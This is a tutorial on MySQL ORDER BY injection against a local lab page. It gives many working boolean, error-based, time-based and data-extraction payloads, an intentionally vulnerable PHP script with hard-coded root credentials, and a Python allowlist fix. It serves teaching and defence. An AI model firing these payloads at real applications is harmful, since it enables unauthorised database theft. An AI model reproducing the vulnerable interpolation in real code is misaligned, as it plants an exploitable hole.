What is an ORDER BY injection
This article covers the case where the value that follows an ORDER BY clause is attacker-controlled, as in the following query, where the order parameter is taken straight from the request:
"select * from goods order by $_GET['order']"
Basic detection
A great many early injections were found by using the ORDER BY clause to quickly work out the number of columns and then matching a UNION SELECT statement to get an echo. The same idea applies here: change the order parameter to a large integer and watch the response. ORDER BY accepts a column's ordinal position, so no column name is needed (the goods table in the appendix has only three columns, so position 11 fails). Note that the position must be a literal integer: an expression such as order=3-1 evaluates to a constant, which does not sort by the second column, so it does not behave like order=2.
http://192.168.239.2:81/?order=11 error
http://192.168.239.2:81/?order=1 normal
Constructing further payloads
The check above is not conclusive, so we need payloads that behave like "and 1=1" / "and 1=2", with a true and a false branch that produce visibly different results, to make data extraction easier.
http://192.168.239.2:81/?order=IF(1=1,name,price) sorted by the name column
http://192.168.239.2:81/?order=IF(1=2,name,price) sorted by the price column
/?order=(CASE+WHEN+(1=1)+THEN+name+ELSE+price+END) sorted by the name column
/?order=(CASE+WHEN+(1=2)+THEN+name+ELSE+price+END) sorted by the price column
http://192.168.239.2:81/?order=IFNULL(NULL,name) sorted by the name column
http://192.168.239.2:81/?order=IFNULL(NULL,price) sorted by the price column
In each pair the two responses come back in a different order. RAND() with a seed works too: rand(1=1) is rand(1) and rand(1=2) is rand(0), and each seed gives its own fixed, repeatable order.
http://192.168.239.2:81/?order=rand(1=1)
http://192.168.239.2:81/?order=rand(1=2)
Using errors
Sometimes the column names are unknown, and telling two sort orders apart is not very intuitive either. In that case make the false branch of the IF raise a database error, so the response is either the normal result or an error. For example, a subquery that returns more than one row:
http://192.168.239.2:81/?order=IF(1=1,1,(select+1+union+select+2)) normal
http://192.168.239.2:81/?order=IF(1=2,1,(select+1+union+select+2)) error
/?order=IF(1=1,1,(select+1+from+information_schema.tables)) normal
/?order=IF(1=2,1,(select+1+from+information_schema.tables)) error
Using REGEXP (0x00 is not a valid pattern, so REGEXP fails when the condition is false):
http://192.168.239.2:81/?order=(select+1+regexp+if(1=1,1,0x00)) normal
http://192.168.239.2:81/?order=(select+1+regexp+if(1=2,1,0x00)) error
Using UPDATEXML (user() is not a valid XPath expression; the resulting XPATH syntax error also echoes part of the value, which is why these two functions are commonly used for error-based extraction):
http://192.168.239.2:81/?order=updatexml(1,if(1=1,1,user()),1) normal
http://192.168.239.2:81/?order=updatexml(1,if(1=2,1,user()),1) error
Using EXTRACTVALUE:
http://192.168.239.2:81/?order=extractvalue(1,if(1=1,1,user())) normal
http://192.168.239.2:81/?order=extractvalue(1,if(1=2,1,user())) error
Time-based blind
Note: if SLEEP is placed directly in the expression, as in if(1=2,1,SLEEP(2)), it is evaluated once per row, so the total delay becomes 2 seconds times the number of records in the table, which amounts to a denial of service against the server. Wrapping it in a derived table makes it run only once:
/?order=if(1=1,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test)) normal response time
/?order=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test)) sleeps 2 seconds
Guessing data
Take guessing user(), which is root@localhost, as an example. Only one character can be tested per request, so SUBSTR, SUBSTRING, MID, LEFT and RIGHT are used to cut out exactly one character of the string, and then =, LIKE or REGEXP to compare it. Note that LIKE is case-insensitive under MySQL's default collations.
The first character of user() is "r", whose ASCII code in hex is 0x72:
http://192.168.239.2:81/?order=(select+1+regexp+if(substring(user(),1,1)=0x72,1,0x00)) normal
http://192.168.239.2:81/?order=(select+1+regexp+if(substring(user(),1,1)=0x71,1,0x00)) error
To guess the name of a table in the current database:
/?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x67,1,0x00)) normal
/?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x66,1,0x00)) error
To guess a column name in a given table (0x676f6f6473 is "goods"):
/?order=(select+1+regexp+if(substring((select+concat(column_name)from+information_schema.columns+where+table_schema%3ddatabase()+and+table_name%3d0x676f6f6473+limit+0,1),1,1)=0x69,1,0x00)) normal
/?order=(select+1+regexp+if(substring((select+concat(column_name)from+information_schema.columns+where+table_schema%3ddatabase()+and+table_name%3d0x676f6f6473+limit+0,1),1,1)=0x68,1,0x00)) error
sqlmap test
When there is no filtering, sqlmap also detects the injection point.
Appendix: source code
The test page (intentionally vulnerable: the order parameter is interpolated into the query unescaped; uses the old mysql_* extension):
<?php
error_reporting(0);
session_start();
mysql_connect("127.0.0.1", "root", "root") or die("Database connection failed");
mysql_select_db("sqlidemo") or die("Select database failed");
// Vulnerable on purpose: the order parameter goes straight into ORDER BY
$order = $_GET['order'] ? $_GET['order'] : 'name';
$sql = "select id,name,price from goods order by $order";
$result = mysql_query($sql);
$reslist = array();
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
    array_push($reslist, $row);
}
echo json_encode($reslist);
The database (the char length and the prices of banana and peach are not legible in the original; the values below are assumptions, any distinct integers will do):
create database sqlidemo;
use sqlidemo;
create table goods (
    id int(4) not null primary key auto_increment,
    name char(20) not null,   -- length garbled in the original; 20 assumed
    price int(4) not null
);
insert into goods (name, price) values ("apple", 10);
insert into goods (name, price) values ("banana", 5);  -- price assumed
insert into goods (name, price) values ("peach", 8);   -- price assumed
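The appendix script cannot be fixed with a bound parameter: ORDER BY takes an identifier, and a placeholder would sort by a constant string rather than by a column. The fix is an allowlist that maps the request value onto a fixed set of column names. The following is an added example, not part of the original page, written in Python rather than the page's PHP so the same logic is shown in one language; the sortable column set, the optional "asc"/"desc" suffix and the default sort are assumptions.

```python
"""Allowlisted ORDER BY construction (added example, not the page's code).

Assumptions: the goods table from the appendix (id, name, price), a default
sort by name as in the PHP script, and an optional direction suffix.
"""
from typing import Optional

# Request value -> identifier emitted into SQL.  Only the right-hand side
# ever reaches the query text, so no user-controlled byte is interpolated.
SORTABLE_COLUMNS = {"id": "id", "name": "name", "price": "price"}
_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


class BadSortParameter(ValueError):
    """Raised for any sort request that is not on the allowlist."""


def order_by_clause(raw: Optional[str], default: str = "name") -> str:
    """Map a user-supplied sort request onto a fixed ORDER BY fragment.

    Accepts "<column>" or "<column> <asc|desc>" (case-insensitive) with
    column in SORTABLE_COLUMNS; anything else, including every payload in
    this article, is rejected instead of being interpolated.
    """
    value = (raw or default).strip().lower()
    parts = value.split()
    if len(parts) not in (1, 2):
        raise BadSortParameter(repr(raw))
    column = SORTABLE_COLUMNS.get(parts[0])
    if column is None:
        raise BadSortParameter(repr(raw))
    direction = _DIRECTIONS.get(parts[1] if len(parts) == 2 else "asc")
    if direction is None:
        raise BadSortParameter(repr(raw))
    return f"ORDER BY `{column}` {direction}"


def build_query(raw_order: Optional[str]) -> str:
    """The appendix query with the order parameter routed through the allowlist."""
    return f"SELECT id, name, price FROM goods {order_by_clause(raw_order)}"


def is_rejected(raw_order: Optional[str]) -> bool:
    """True iff the allowlist refuses the request value."""
    try:
        order_by_clause(raw_order)
    except BadSortParameter:
        return True
    return False


if __name__ == "__main__":
    print(build_query(None))          # default sort
    print(build_query("price desc"))
    for payload in ("IF(1=1,name,price)",
                    "(select 1 regexp if(1=2,1,0x00))",
                    "if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test))"):
        print(f"{payload!r}: rejected={is_rejected(payload)}")
```

The request value is used only as a dictionary key; the identifier that ends up in the SQL text always comes from the allowlist, which is what makes the approach safe regardless of what the client sends.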
MySQL ORDER BY injection summary